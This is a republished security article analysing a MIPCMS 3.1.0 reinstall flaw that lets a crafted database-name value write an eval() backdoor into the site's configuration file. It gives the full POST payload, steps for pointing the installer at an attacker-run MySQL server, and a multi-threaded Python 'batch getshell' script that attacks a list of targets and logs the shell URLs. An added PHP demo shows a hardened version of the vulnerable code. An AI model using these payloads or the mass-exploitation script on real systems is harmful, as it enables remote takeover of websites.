2025-02-24 Update. From: SLTechnology News&Howtos (Network Security)
Shulou(Shulou.com)05/31 Report--
The editor shares an analysis of the MIPCMS V3.1.0 remote configuration-file write (getshell) process. Most readers are probably not familiar with it, so the article is shared here for reference; I hope you learn something from it.
0x02 Environment
Program source code download: http://www.mipcms.cn/mipcms-3.1.0.zip
Web environment: Deepin Linux + Apache2 + PHP 5.6 + MySQL (192.168.1.101)
Remote database server: Windows 10 x64 (192.168.1.102)
0x03 Vulnerability exploitation process
1. Install the program normally first.
2. Enable remote access on the remote database server (192.168.1.102), then create a database on it named test',1=>eval(file_get_contents('php://input')),'2%'=>'
3. Send the re-install request. POST to http://www.getpass.test//index.php?s=/install/Install/installPost with the body:
username=admin&password=admin&rpassword=admin&dbport=3306&dbname=test',1=>eval(file_get_contents('php://input')),'2%'=>'&dbhost=192.168.1.102&dbuser=root&dbpw=root
Remember that dbhost, dbuser and dbpw must match your own remote database server. The dbname value contains ', =, %, ( and ), so if you build the request by hand, percent-encode the value and make sure those characters reach the server unchanged.
You can now see that the eval() one-liner has been written into the configuration file.
4. Execute code (how the PoC is constructed is explained in detail below). POST to http://www.getpass.test/system/config/database.php with the raw request body:
phpinfo();
0x04 Framework background
Some readers may not know the ThinkPHP framework well, so a brief explanation follows; the official manual is the best reference: https://www.kancloud.cn/manual/thinkphp5/118003.
First, set the two options shown in the original screenshot (not reproduced here) to true in the ThinkPHP configuration file /system/config/config.php.
Then open the site (freshly deployed and not yet installed). It redirects to the installation page automatically, and with the settings just made a small green icon appears in the lower right corner; clicking it opens ThinkPHP's trace panel, which lists the files loaded for the request.
Many files are preloaded; the one that matters here is the routing file Route.php.
It checks whether install.lock exists and, if the file is missing, redirects to the installation interface.
0x05 Vulnerability code analysis
The problem is in /app/install/controller/Install.php. The index method checks for install.lock, but the installPost method has no such check and is not tied to index in any way; install.html submits straight to installPost, so the program can be reinstalled at will.
Read the code below in order; I have added comments to it (screenshots, not reproduced here). Two points matter:
1. It iterates over the database details; I dumped $matches in a screenshot so you can see its contents.
2. It fills in the configuration file with $conf = str_replace("#{$key}#", $value, $conf); I took a screenshot of the configuration template while I was at it.
0x06 Payload construction
From the code analysis above, the parameters that must be supplied are:
username password rpassword dbport dbname dbhost dbuser dbpw
The user name and password can be anything. The database parameters are the obstacle: without valid database details the process cannot continue, because the code exits if the database connection fails.
Then I saw a fellow researcher's bypass and kicked myself for not thinking of it: dbhost can point at any server, so we set up a MySQL server of our own and let the target connect to it.
With the database solved, how do we get our code into the configuration file? Several values are written into it, but the server address, user name and password cannot carry it: MySQL user names are limited to 16 characters by default (the limit can be changed, but the database converts the name automatically), the database password is encrypted before it is written, and changing the table prefix makes table creation fail so the program no longer runs.
So whatever we construct must not break the structure of the file, and the only value left to use is dbname.
3. One more problem: even with a direct one-liner, the code does $dbname=strtolower(input('post.dbname')), so the $_POST and $_GET of a one-liner would be lowercased to $_post and $_get and stop working. Instead we read the request body through the php://input stream wrapper, which is already all lowercase, and pass it to eval (assert would also do).
I won't explain php://input here; there is a detailed forum article devoted to it: https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=27441
4. From the code analysis, the replaced value is followed by a ' in the template, so the value must close the opening quote, add the injected array element, and finish with an opening quote that the template's trailing ' closes: test',1=>eval(file_get_contents('php://input')),'2%'=>'. After replacement the line reads 'database' => 'test',1=>eval(file_get_contents('php://input')),'2%'=>'', which is valid PHP.
Final payload:
username=admin&password=admin&rpassword=admin&dbport=3306&dbname=test',1=>eval(file_get_contents('php://input')),'2%'=>'&dbhost=192.168.1.102&dbuser=root&dbpw=root
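As an added example (not code from MIPCMS or ThinkPHP), the PHP below reproduces the str_replace() substitution described in 0x05 with a stand-in template, shows the line the payload above produces, and puts a hardened version of the same write beside it: refuse to run when install.lock exists, accept only plain identifiers for the database name and user, and emit the configuration with var_export() so that no input can break out of its string literal. The template text, the placeholder names, the lock-file path and the validation rules are assumptions modelled on the page, not the project's own files.

```php
<?php
// Added example: not MIPCMS or ThinkPHP code. TEMPLATE is a stand-in for
// system/config/database.php shaped as the page describes (values inside
// single quotes, placeholders of the form #key#); the real file has more keys.
const TEMPLATE = "<?php\nreturn [\n"
    . "    'hostname' => '#hostname#',\n"
    . "    'database' => '#database#',\n"
    . "    'username' => '#username#',\n"
    . "];\n";

// Vulnerable form: the str_replace() loop the page shows, copying user
// input straight into PHP source code.
function renderVulnerable(array $values): string
{
    $conf = TEMPLATE;
    foreach ($values as $key => $value) {
        $conf = str_replace("#{$key}#", $value, $conf);
    }
    return $conf;
}

// Hardened form: no text substitution at all. Each value is checked against
// what a connection parameter may legitimately contain, then the whole array
// is serialised with var_export(), which quotes and escapes correctly
// whatever the input is.
function renderHardened(array $values): string
{
    foreach (['database', 'username'] as $key) {
        if (!isset($values[$key]) || !preg_match('/^[A-Za-z0-9_]{1,64}$/', $values[$key])) {
            throw new InvalidArgumentException("$key must be a plain identifier");
        }
    }
    $host = $values['hostname'] ?? '';
    if (!filter_var($host, FILTER_VALIDATE_IP)
        && !filter_var($host, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME)) {
        throw new InvalidArgumentException('hostname must be an IP address or host name');
    }
    return "<?php\nreturn " . var_export($values, true) . ";\n";
}

// The check installPost lacks: index() refuses to reinstall when install.lock
// exists, so installPost() must too. The lock path is an assumption.
function assertNotInstalled(string $lockFile): void
{
    if (is_file($lockFile)) {
        throw new RuntimeException('already installed, refusing to reinstall');
    }
}

$payload = "test',1=>eval(file_get_contents('php://input')),'2%'=>'";

// The installer lowercases dbname, which is why a $_POST one-liner cannot be used:
echo strtolower("eval(\$_POST['c'])"), "\n";   // eval($_post['c'])

$input = ['hostname' => '192.168.1.102', 'database' => strtolower($payload), 'username' => 'root'];
echo "--- vulnerable output ---\n", renderVulnerable($input);
// database line becomes:
// 'database' => 'test',1=>eval(file_get_contents('php://input')),'2%'=>'',

echo "--- hardened output ---\n";
try {
    echo renderHardened($input);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";   // rejected: database must be a plain identifier
}
echo renderHardened(['hostname' => '127.0.0.1', 'database' => 'mipcms', 'username' => 'mip']);

// Lock-file check, using a temporary file so the demo is self-contained.
$lock = sys_get_temp_dir() . '/install.lock';
touch($lock);
try {
    assertNotInstalled($lock);
} catch (RuntimeException $e) {
    echo $e->getMessage(), "\n";
}
unlink($lock);
```

Run it with `php demo.php`. The identifier regex is deliberately stricter than what MySQL itself allows for quoted names; for an installer that is the right trade-off, because the value also ends up inside generated PHP, and a database name that needs quoting characters is not something an install form has to support.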
0x07 Batch getshell script in Python
The database details are written inside the script; change them directly in the code. Passing them as command-line parameters would be more cumbersome. The script as it appears on the page is cut off inside main(), so the argument handling below is reconstructed to match the -f convention the exploit() function already uses.

#!/usr/bin/env python3
# author: F0rmat
import sys
import threading

import requests

# Attacker-controlled MySQL server; edit these before running.
DBHOST = '192.168.1.102'
DBUSER = 'root'
DBPW = 'root'
DBPORT = 3306
# dbname payload: closes the 'database' string in the template and injects
# eval() of the raw request body as an extra array element.
DBNAME = "test',1=>eval(file_get_contents('php://input')),'2%'=>'"


def exploit(target):
    target = target.strip().rstrip('/')
    url1 = target + "/index.php?s=/install/Install/installPost"
    data = {
        "username": "admin", "password": "admin", "rpassword": "admin",
        "dbport": DBPORT, "dbname": DBNAME, "dbhost": DBHOST,
        "dbuser": DBUSER, "dbpw": DBPW,
    }
    # Code run by the injected eval(): writes shell.php next to database.php.
    # As shown on the page the written file contains only the string 'f0rmat'.
    payload = "fwrite(fopen('shell.php','w'),'f0rmat');"
    url2 = target + "/system/config/database.php"
    shell = target + '/system/config/shell.php'
    try:
        requests.post(url1, data=data, timeout=10)      # re-run the installer
        requests.post(url2, data=payload, timeout=10)   # raw body -> php://input
        verify = requests.get(shell, timeout=3)
        if "f0rmat" in verify.text:
            print('Write success, shell url:', shell, 'pass:f0rmat')
            with open("success.txt", "a+") as f:
                f.write(shell + ' pass:f0rmat' + "\n")
        else:
            print(target, 'Write failure')
    except Exception as e:
        print(target, e)


def main():
    if len(sys.argv) < 2:
        print('usage: %s <target-url> | -f <targets.txt>' % sys.argv[0])
        sys.exit(1)
    if sys.argv[1] == "-f":
        with open(sys.argv[2]) as f:
            targets = [line for line in f if line.strip()]
        threads = [threading.Thread(target=exploit, args=(t,)) for t in targets]
        for t in threads:
            t.start()
        for t in threads:
            t.join()
    else:
        exploit(sys.argv[1])


if __name__ == '__main__':
    main()
© 2024 shulou.com SLNews company. All rights reserved.